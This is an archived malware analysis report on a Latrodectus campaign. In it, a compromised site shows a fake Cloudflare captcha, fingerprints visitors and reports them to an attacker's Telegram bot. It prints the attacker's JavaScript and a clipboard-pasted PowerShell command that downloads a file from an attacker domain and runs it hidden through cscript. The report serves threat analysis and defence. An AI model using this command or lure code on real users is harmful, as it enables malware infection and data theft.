{
	"id": "ce0e67cd-eac8-4141-8275-d7a390fddbb2",
	"created_at": "2026-04-06T00:22:20.44801Z",
	"updated_at": "2026-04-10T03:21:28.060448Z",
	"deleted_at": null,
	"sha1_hash": "97415f0ec14d7d918a7f7d43e783bd7eb037f96e",
	"title": "Latrodectus Malware Delivered via Telegram Bot/Chat API",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 304042,
	"plain_text": "Latrodectus Malware Delivered via Telegram Bot/Chat API\r\nPublished: 2025-04-02 · Archived: 2026-04-05 20:34:40 UTC\r\nLatrodectus Malware Delivered via Telegram Bot/Chat API\r\nApril 2, 2025\r\nHello Everyone,\r\nThis article will explore how a watering hole attack was employed to spread the Latrodectus Malware. The\r\nattacker usually targets websites with Cross-Origin Resource Sharing (CORS) Vulnerability.\r\nIn the recent attack vector, the attacker exploited a vulnerable website and injected Javascript to load the malicious\r\nC2 domain. The injected Javascript creates an iframe that overlays the original site, with the attacker’s page being\r\ndisplayed within that iframe.\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 1 of 7\n\niframe injection\r\nThe iframe loads the following files:\r\n–       Fake Cloudflare captcha page\r\n–       JavaScript file to communicate with C2 server(script1.js)\r\n–       CSS file (all.css)\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 2 of 7\n\nThe Fake Captcha challenge page tricks the victim into downloading a malicious text file from the C2 server.\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 3 of 7\n\nAttack Chain:\r\nWebsite-\u003e JavaScript1 -\u003e TXT file -\u003eJavaScript2-\u003e MSI package-\u003e Vulnerable Executable + Latrodectus DLL -\u003e Post\r\nScript1.js Analysis\r\nThe TA creates a Telegram bot and connects it to the attacker’s Telegram account using the Telegram Chat ID. The\r\nattacker manipulates the webpage’s DOM to replace/verify the content of the fake Cloudflare Captcha page.\r\nconst TELEGRAM_BOT_TOKEN = 'XXXXXXX:XXXXXXXXXXXXX';\r\nconst TELEGRAM_CHAT_ID = 'XXXXX';\r\nThe script creates a unique username using the following array. The username is used to track the Website visitors.\r\n const adjectives = [\r\n 'Long', 'Spider', 'Crazy', 'Brave', 'Silent', 'Mighty', 'Quick', 'Wise',\r\n 'Sneaky', 'Cosmic', 'Iron', 'Golden', 'Shadow', 'Frost', 'Thunder'\r\n ];\r\n const animals = [\r\n 'Dog', 'Cat', 'Wolf', 'Fox', 'Hawk', 'Bear', 'Lion', 'Eagle',\r\n 'Shark', 'Scat', 'Whale', 'Owl', 'Tiger', 'Cobra', 'Raven'\r\n ];\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 4 of 7\n\nThe script counts how many times the user clicks the Check box button.\r\nThe script queries the user agent data from the browser and retrieves the following data:\r\nBrowserName\r\nBrowserVersion\r\nOSName\r\nThe script uses Telegram API to send the data to the attacker. A JSON data blob is created containing the\r\nnotification message and the Telegram chat ID.\r\nBased on the OS detection and the click counts, the script sends the following message and Browser data to TA\r\ntelegram account:\r\n let notificationMessage = `🚨💥 ALERT! New click detected by ${uniqueUsername}!🔥\\n` +\r\n `-------------------------------------\\n` +\r\n ` OS: ${browserInfo.os}\\n` +\r\n ` SYSTEM: ${browserInfo.name} ${browserInfo.version}\\n` +\r\n ` CLICKS: ${clickCount} 🔢\\n` +\r\n `-------------------------------------`;\r\n if (browserInfo.os === 'Windows') {\r\n notificationMessage = `💻✨ Windows User Alert! **${uniqueUsername}** clicked! 🎉\\n` +\r\n `-------------------------------------\\n` +\r\n ` OS: ${browserInfo.os}\\n` +\r\n ` SYSTEM: ${browserInfo.name} ${browserInfo.version}\\n` +\r\n ` CLICKS: ${clickCount} 🔢\\n` +\r\n `-------------------------------------`;\r\n }\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 5 of 7\n\nThe threat actor also checks if the user clicked on the Check Box button. If the victim’s operating system is\nWindows and click count is 2, a notification is sent to TA’s telegram.\nif (browserInfo.os === 'Windows' \u0026\u0026 clickCount === 2) {\n await sendTelegramNotification(`⚠️ **${uniqueUsername}**, please check the panel ASAP! 🚀💫`);\n }\nIf the victim’s operating system is Windows, if the user did not click the Check Box button and if the user is idle\nfor 20 seconds, SetTimeout() function is executed. The SetTimeout() function will remove malicious iframe from\nthe webpage and hide the TA’s presence.\n if (browserInfo.os === 'Windows') {\n setTimeout(() =\u003e {\n sendTelegramNotification(`⏳ **${uniqueUsername}**, 20 seconds have passed! Keep me updated until I\n }, 20000);\n }\nFinally, the malicious command is copied to the browser’s clipboard so that the victim can execute it by pasting it\ninto the Run command screen.\nconst cmd = `cmd /c start /min powershell -w hidden -c \"$f=Join-Path $env:TEMP 'd.txt';\ncurl.exe -s 'https://lexip.live/n/' -o $f;\n$w=New-Object -ComObject WScript.Shell;\n$w.Run('cscript.exe //E:jscript \\\"'+$f+'\\\"',0,$false)\"`;\n ✅ \"I am not a robot - Cloudflare Verification ID: 146820\"\nThe victim initiates the process(cmd.exe), and the process(cmd.exe) spawns the Powershell process. The\nPowershell process attempts to download the malicious payload(d.txt) from the attacker domain(using curl.exe).\nAfter downloading the malicious payload, the powershell process spawns the CScript process and executes the\nfile(d.txt) as a Javascript file.\nJavaScript file(d.txt)\nThe JavaScript file(d.txt) downloads an MSI file from the C2 server. The MSI file contains a vulnerable binary\nand a Latrodectus DLL. The binary will load the DLL for further exploitation.\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\nPage 6 of 7\n\nSource: https://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nhttps://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://jmp-esp.org/2025/04/01/latrodectus-malware-delivered-via-telegram-bot-chat-api/"
	],
	"report_names": [
		"latrodectus-malware-delivered-via-telegram-bot-chat-api"
	],
	"threat_actors": [],
	"ts_created_at": 1775434940,
	"ts_updated_at": 1775791288,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/97415f0ec14d7d918a7f7d43e783bd7eb037f96e.pdf",
		"text": "https://archive.orkl.eu/97415f0ec14d7d918a7f7d43e783bd7eb037f96e.txt",
		"img": "https://archive.orkl.eu/97415f0ec14d7d918a7f7d43e783bd7eb037f96e.jpg"
	}
}